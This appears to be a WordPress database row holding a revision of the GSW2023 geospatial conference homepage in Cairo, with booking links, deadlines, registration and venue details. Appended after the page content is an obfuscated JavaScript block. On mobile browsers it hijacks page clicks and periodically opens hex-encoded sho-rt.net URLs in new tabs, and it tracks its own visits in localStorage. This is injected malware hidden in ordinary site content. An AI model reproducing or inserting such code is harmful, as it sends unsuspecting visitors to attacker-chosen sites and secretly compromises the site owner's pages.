link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:02:50','2023-06-01 08:02:50','',3066,'https://gsw2023.com/?p=4595',0,'revision','',0),
